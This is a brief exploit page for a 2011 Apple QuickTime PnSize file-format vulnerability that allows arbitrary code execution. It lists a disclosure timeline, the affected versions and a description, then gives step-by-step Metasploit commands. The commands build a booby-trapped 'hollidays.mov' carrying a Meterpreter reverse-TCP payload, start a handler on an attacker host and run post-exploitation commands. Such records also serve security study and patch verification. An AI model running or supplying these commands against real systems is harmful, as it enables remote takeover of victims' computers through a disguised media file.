Timeline :
Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03
PoC provided by :
MC
Reference(s) :
Affected version(s) :
All Apple QuickTime Player previous to version 7.7
Tested on Windows XP SP3 with :
Apple QuickTime Player 7.6 (472)
Description :
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.
Commands :
use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jgetuid
sysinfo